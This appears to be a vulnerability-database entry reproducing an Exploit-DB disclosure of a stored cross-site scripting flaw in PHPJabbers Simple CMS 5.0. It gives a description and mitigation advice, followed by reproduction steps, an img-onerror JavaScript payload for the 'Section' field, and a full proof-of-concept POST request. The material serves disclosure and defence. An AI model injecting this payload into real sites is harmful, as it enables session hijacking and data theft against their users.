PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)

vendor:

Simple CMS

by:

Ahmet Ümit BAYRAM

8.6

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Simple CMS

Affected Version From: 5

Affected Version To: 5

Patch Exists: NO

Related CWE:

CPE: a:phpjabbers:simple_cms:5.0

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux

2023

PHPJabbers Simple CMS V5.0 – Stored Cross-Site Scripting (XSS)

The PHPJabbers Simple CMS V5.0 is vulnerable to a stored cross-site scripting (XSS) vulnerability. By injecting a specially crafted payload in the 'Section' box, an attacker can execute arbitrary JavaScript code in the context of the victim's browser. This can lead to various attacks, including session hijacking, defacement of the website, and stealing sensitive information.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input before displaying it on web pages. Additionally, implement Content Security Policy (CSP) to restrict the execution of inline scripts and other potentially dangerous content.

Source

Exploit-DB raw data:

# Exploit Title: PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)
# Date: 2023-04-29
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: 5.0
# Tested on: Kali Linux

### Steps to Reproduce ###

- Please login from this address:
https://localhost/simplecms/index.php?controller=pjAdmin&action=pjActionLogin
- Click on the "Add Section" button.
- Then enter the payload ("><img src=x onerror=alert("Stored")>) in the
"Section" box and save it.
- Boom! An alert message saying "Stored" will appear in front of you.

### PoC Request ###

POST /simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
HTTP/1.1
Host: localhost
Cookie: pj_sid=PJ1.0.6199026527.1682777172;
pj_so=PJ1.0.6771252593.1682777172; pjd_1682777220_628=1;
PHPSESSID=bmannt0kqjm2m0vmb5vj1dbu57; simpleCMS=ejrnh4bmb0ems1j4e4r9fq4eq1;
pjd=7l9bb4ubmknrdbns46j7g5cqn7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101
Firefox/102.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 371
Origin: https://localhost
Referer:
https://localhost/simplecms/index.php?controller=pjAdminSections&action=pjActionCreate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

section_create=1&i18n%5B1%5D%5Bsection_name%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%3E&i18n%5B2%5D%5Bsection_name%5D=&i18n%5B3%5D%5Bsection_name%5D=&i18n%5B1%5D%5Bsection_content%5D=%3Cp%3E%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dalert%28%22Stored%22%29%26gt%3B%3C%2Fp%3E&i18n%5B2%5D%5Bsection_content%5D=&i18n%5B3%5D%5Bsection_content%5D=&url=&status=T